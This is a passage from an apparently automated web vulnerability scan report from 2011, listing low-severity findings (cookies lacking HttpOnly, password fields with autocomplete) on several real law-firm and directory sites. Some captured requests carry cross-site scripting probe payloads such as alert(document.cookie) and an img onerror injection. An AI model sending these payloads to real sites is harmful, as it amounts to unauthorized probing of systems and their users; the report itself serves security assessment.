Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:07 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 09 Sep 2010 14:06:03 GMT
ETag: "a525b5-205f-2165c8c0"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:11 GMT;path=/
Content-Length: 8287

@charset "utf-8";
/* CSS Document */


.segment {
   float:left;
/*margin-top:-5px;
   width:645px;*/
}

.segment.prestige {
   border:none;
   padding-left:0px;
   padding-right:0px;
   width:665px;
   back
...[SNIP]...

10.228. http://www.vault.com/styles/login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 05 Nov 2010 15:24:35 GMT
ETag: "a525b9-1a8b-df3592c0"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:14 GMT;path=/
Content-Length: 6795

@charset "utf-8";

.gold {
    /* color: #e6932b;gold */
}

.green {
   color: #339900; /* green */
   background: white;
}

h1 {
/*Commented out by Ruben Guzman*/
/*    margin: 20px 0 0 0px;*/
}

#error-messa
...[SNIP]...

10.229. http://www.vault.com/styles/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/main.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 Jan 2011 22:25:40 GMT
ETag: "a525e3-28469-ea032100"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:25 GMT;path=/
Content-Length: 164969

@charset "utf-8";

:focus {outline: 0;}

/* slightly enhanced, universal clearfix hack */
.clearfix:after {
visibility: hidden;
display: block;
font-size: 0;
content: " ";
cle
...[SNIP]...

10.230. http://www.vault.com/styles/membership.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/membership.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/membership.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 05 Jan 2011 19:25:18 GMT
ETag: "a525c6-7fac-58662380"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:14 GMT;path=/
Content-Length: 32684

p {
margin: 5px 0;
}

#gold-membership {
   margin:15px;
}
#gold-membership p {
width: 450px;
float:left;
}

#gold-membership h1 {
width: 475px;
margin-left:0px;
}

#gold-membership span {

...[SNIP]...

10.231. http://www.vault.com/styles/polls.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/polls.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/polls.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Sep 2010 17:55:03 GMT
ETag: "a525c8-1111-18aecbc0"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 4369

/*LISTPOLL.JSP*/

#pollQuestions {
   padding-bottom:15px;
   margin: 10px 0 5px 0;
}
#pollQuestion{
   float:left;
   padding:0;
   margin:0;
   font-weight: bold;
   color:#333; /* dark grey */
   ba
...[SNIP]...

10.232. http://www.vault.com/styles/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/print.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 01 Oct 2010 14:17:00 GMT
ETag: "a525b6-2b25-d9110f00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 11045

html { margin: 0;padding:0;}
body { margin: 0;padding:0; height: 100% !important; overflow-y: visible !important; overflow: visible !important; position:relative !important; float:none !important;}
bo
...[SNIP]...

10.233. http://www.vault.com/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9EQVM4ZjQ4NzUwMDAxLzI3MDgxMi9saQ!!/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9EQVM4ZjQ4NzUwMDAxLzI3MDgxMi9saQ!!/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9EQVM4ZjQ4NzUwMDAxLzI3MDgxMi9saQ!!/ HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Origin: http://www.vault.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
Content-Length: 160

userid=&password=&WPSRedirectURL=http%3A%2F%2Fwww.vault.com%2Fwps%2Fmyportal%2Fusa%2Frankingsf6c40%27%3Balert%28document.cookie%29%2F%2Fdba4d06d54c%2Findividual

Response

HTTP/1.1 302 Found
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
$WSEP:
Location: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 58


</div> <!--- /wrapper --->
</body>
</html>

10.234. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...

10.235. http://www.weil.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=f5iszeqogtut2im5bsdgiyf3; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19338
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...

10.236. http://www.yellowpages.com/Washington-DC/Attorneys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC/Attorneys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Washington-DC/Attorneys HTTP/1.1
Host: www.yellowpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 19 Jan 2011 15:13:37 GMT
Status: 301 Moved Permanently
Server: nginx
Content-Type: text/plain
Location: http://www.yellowpages.com/washington-dc/attorneys
Content-Length: 9
X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752
Expires: Wed, 19 Jan 2011 15:13:36 GMT
Cache-Control: no-cache
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
Connection: close

moved to

10.237. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a HTTP/1.1
Host: www.yellowpages.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261271506.1295450814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=261271506.1001034229.1295450814.1295450814.1295450814.1; __utmc=261271506; __utmv=261271506.|1=trial_id=relevancyControl2=1,; __utmb=261271506.1.10.1295450814; s_cc=true; s_nr=1295450813968; gpv_p50=error_page; s_sq=%5B%5BB%5D%5D; track_link=%7B%22pageName%22%3A%22error_page%22%7D; s_vi=[CS]v1|269B81578514AD15-60000169A0247D25[CE]; search_terms=Attorneys; parity_analytics=---+%0A%3Avisit_id%3A+nfa4wzodvfw2y17mv7r0lysb8wmr3%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A15%3A48.284574+%2B00%3A00%0A; vrid=eb20d5b0-060c-012e-ac55-001b782eaaae; _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; b=10010

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:51 GMT
Status: 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "949e18924a8dcea5e9bdd6d06bf089a4"
Cache-Control: no-cache
Set-Cookie: track_link=; domain=yellowpages.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: search_terms=a; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+xcoq4zeuc44uriy2ui83ef05gr06h%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A26%3A51.502219+%2B00%3A00%0A; path=/; expires=Sat, 19-Jan-2036 15:26:51 GMT
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; path=/; HttpOnly
X-Urid: d-763b5ff0-060e-012e-f3e3-00237da31aba
Expires: Wed, 19 Jan 2011 15:26:50 GMT
Connection: keep-alive
Content-Length: 227262

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...

11. Password field with autocomplete enabled  previous  next
There are 24 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. http://dcregistry.com/wbn/welcome.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /wbn/welcome.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wbn/welcome.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:20:53 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 49869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td>
<form method="post"
action="http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl">

<center>
...[SNIP]...
<td>
<input type="password" name="password"
size="22" value="" maxlength="20" />

<p>
...[SNIP]...

11.2. http://dcregistry.com/wbn/welcome.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /wbn/welcome.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wbn/welcome.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:20:53 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 49869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td>
<form method="post"
action="http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl">

<center>
...[SNIP]...
<td>
<input type="password" name="password"
size="22" value="" maxlength="20" />
<br />
...[SNIP]...

11.3. https://immigration.ebglaw.com/TrkrSSL.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://immigration.ebglaw.com
Path:   /TrkrSSL.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /TrkrSSL.html HTTP/1.1
Host: immigration.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 02 Dec 2010 22:02:23 GMT
Accept-Ranges: bytes
ETag: "fe5bfa986c92cb1:0"
Server: Microsoft-IIS/7.5
